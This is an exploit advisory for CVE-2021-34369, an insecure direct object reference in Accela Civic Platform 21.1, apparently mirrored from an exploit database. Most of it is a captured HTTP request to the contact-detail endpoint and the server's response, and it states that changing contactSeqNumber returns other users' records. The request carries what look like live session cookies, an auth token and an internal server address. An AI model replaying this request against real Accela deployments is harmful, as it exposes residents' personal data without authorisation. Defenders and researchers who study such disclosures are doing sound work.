Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)

Exploit Author: Abdulazeez Alaseeri Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Java Published Date: 2021-06-14 
# Exploit Title: Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)
# Software Link: https://www.accela.com/civic-platform/
# Version: <= 21.1
# Author: Abdulazeez Alaseeri
# Tested on: JBoss server/windows
# Type: Web App
# Date: 07/06/2021
# CVE: CVE-2021-34369


================================================================
Accela Civic Platform Insecure Direct Object References <= 21.1
================================================================

This vulnerability allows authenticated attackers to view other user's data by manpulating the value of contactSeqNumber
================================================================
Request Heeaders start
================================================================

GET /portlets/contact/ref/refContactDetail.do?mode=view&lookup=false&contactSeqNumber=848693&module=Licenses HTTP/1.1

Host: Hidden

Cookie: JSESSIONID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1427686922.47873.0000; AAPersistLoginServProvCode=SAFVC; ACSignOnModule=SSOStandard; JSESSIONID=1bQKqPNdLWUadMJTDGeZOsBnei77VrC5stuwC8-K.civpnode; LASTEST_REQUEST_TIME=1623211660218; LoginServProvCode4MultiAgency=SAFVC; LoginUsername4MultiAgency=E0BD5838A6E2B0C4; hostSignOn=true; UUID=a849376e-f27f-4c73-91d1-3181bad7688d; ACSignoff="Hidden"; ACSwitchAgency="Hidden"; LATEST_LB=1427686922.47873.0000; LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; LATEST_WEB_SERVER=10.198.24.86; g_current_language_ext=en_US; ACAuth=77040226932997938167623031760043758249275936032481641290563022545358808190678048903667802506479617333124770883197855794745875802

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Upgrade-Insecure-Requests: 1

Te: trailers

Connection: close

================================================================
Request Heeaders end
================================================================



================================================================
Response Heeaders start
================================================================
HTTP/1.1 200 OK

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

X-Powered-By: JSP/2.3

Set-Cookie: LASTEST_REQUEST_TIME=1623211780357; path=/; domain=.hidden; secure

Set-Cookie: LATEST_LB=1427686922.47873.0000; path=/; domain=.hidden; secure

Set-Cookie: LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; path=/; domain=.hidden; secure

Set-Cookie: LATEST_WEB_SERVER=10.198.24.86; path=/; domain=.hidden; secure

X-XSS-Protection: 0

Pragma: No-cache

X-UA-Compatible: IE=EDGE

Date: Wed, 09 Jun 2021 04:09:40 GMT

Connection: close

Content-Type: text/html;charset=UTF-8

Content-Length: 98126
================================================================
Response Heeaders end
================================================================

contactSeqNumber value can be changed and return valid information about another user and that indicates it is vulnerable to IDOR


درحال حاضر تحلیل هوش مصنوعی برای این اکسپلویت تولید نشده است!